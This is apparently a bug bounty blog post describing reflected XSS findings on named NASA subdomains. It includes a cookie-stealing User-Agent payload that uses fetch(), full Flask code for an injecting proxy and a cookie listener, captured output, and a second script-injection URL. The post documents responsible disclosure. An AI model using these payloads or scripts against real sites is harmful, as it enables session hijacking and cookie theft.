In the cybersecurity community, getting a “Hall of Fame” recognition from an organization like NASA is a significant milestone. It’s not just about finding a bug; it’s about demonstrating real-world impact. I want to share the story of my findings, particularly one that started as “Informational” and became my ticket to the Hall of Fame.

Report 1: The Hall of Fame Vulnerability

This was the key finding. It was a Reflected Cross-Site Scripting (XSS) vulnerability that required a chained exploit to prove its true potential.

Discovery & Initial Triage

  • Target: https://nodis3.gsfc.nasa.gov
  • Endpoint: /cancelled_docs.cfm?search=*

I identified that the User-Agent HTTP header was being reflected directly into the HTML response without proper output encoding. My initial report, using a simple alert() payload, was marked as “Informational.” This is common for User-Agent based XSS as it’s not a “clickable” link exploit and is often considered “self-XSS.”

I knew the impact was much higher. To prove it, I had to show how an attacker could force a victim’s browser to send the malicious User-Agent and, more importantly, what they could steal.

Upgrading the Impact: The Exploit Chain

My goal was to upgrade this from a simple reflection to a one-click, silent cookie-stealing exploit. To do this, I built a two-part system:

  1. A Flask Proxy Server: To act as the attacker’s malicious website.
  2. A Flask Cookie Listener: To receive the stolen data.

Technical Deep Dive: The Payload

First, I crafted a payload designed to be injected into the User-Agent header. Instead of a noisy alert(), I used fetch() to silently send the victim’s cookies to my listener.

  • Payload:HTML
  • "><svg onload=fetch('http://localhost:5001/listen?c='+document.cookie)//"

The Exploit Code (PoC)

1. Attacker’s Proxy Server (app.py)

This script forwards the victim to the NASA site but hijacks the User-Agent header and injects the payload. The victim only needs to visit http://127.0.0.1:5000/proxy.

import requests
from flask import Flask, request, Response

app = Flask(__name__)

@app.route("/proxy")
def proxy():
    target_url = "https://nodis3.gsfc.nasa.gov/cancelled_docs.cfm?search=*"
    
    # The malicious payload
    payload = "\"><svg onload=fetch('http://localhost:5001/listen?c='+document.cookie)//\""
    
    # Forging the headers
    headers = { "User-Agent": payload }
    
    try:
        # Forwarding the request to NASA with the malicious header
        resp = requests.get(target_url, headers=headers)
        return Response(resp.content, content_type=resp.headers.get('Content-Type'))
    except Exception as e:
        return f"Error: {e}", 500

if __name__ == "__main__":
    app.run(port=5000)

2. Attacker’s Cookie Listener (cookie.py)

This simple server just waits to receive the data from the fetch() request and prints it to the console.

from flask import Flask, request

app = Flask(__name__)

@app.route('/listen')
def listener():
    # Grabs the cookie from the URL parameter
    cookie = request.args.get('c')
    
    # Attacker's successful result
    print("[+] Cookie received:", cookie)
    
    return "Cookie captured!", 200

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5001)

The Result

By running both scripts and visiting the proxy URL, my listener’s terminal immediately showed the result:

[+] Cookie received: token=mandipxss1_REDACTED_123

I had successfully demonstrated a full attack chain. This proved the vulnerability was not informational, but a critical risk that could lead to complete session hijacking. I resubmitted my findings with the full proof of concept, code, and video.

Report 2: The Hunt Continues (A Duplicate Finding)

Even after the Hall of Fame submission, I continued hunting. I found a second vulnerability on a different subdomain.

  • Target: https://vmsfc.russia.nasa.gov
  • Vulnerability: P3 Reflected XSS
  • Endpoint: /ssl-vpn/getconfig.esp
  • Parameter: user

This was a more conventional Reflected XSS. The user parameter in the URL was not being sanitized.

  • Vulnerable URL: https://vmsfc.russia.nasa.gov/ssl-vpn/getconfig.esp?...&user=<svg xmlns="http://www.w3.org/2000/svg"><script>prompt("XSS")</script></svg>&domain=(empty_domain)&computer=computer

This vulnerability was already known and had been reported by another researcher, so my report was closed as a Duplicate. This is a normal and expected part of the bug bounty process.

Conclusion: Persistence and Recognition

The most interesting part of this journey was the recognition. For that first, high-impact report, I didn’t receive an immediate acknowledgment or reply from the team.

However, my work had been seen. For demonstrating a critical, chained exploit and helping NASA secure its assets, my name was added to the NASA Hall of Fame.

This experience proves two things:

  1. Always show the full impact. Don’t stop at “Informational.” If you believe a bug is more severe, build the exploit and prove it.
  2. Persistence pays off. Even if you don’t get an immediate reply, or if you find duplicates, your work matters. The right report will eventually get the recognition it deserves.

thank you for reding

Best regards,
Mandip Guragai

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *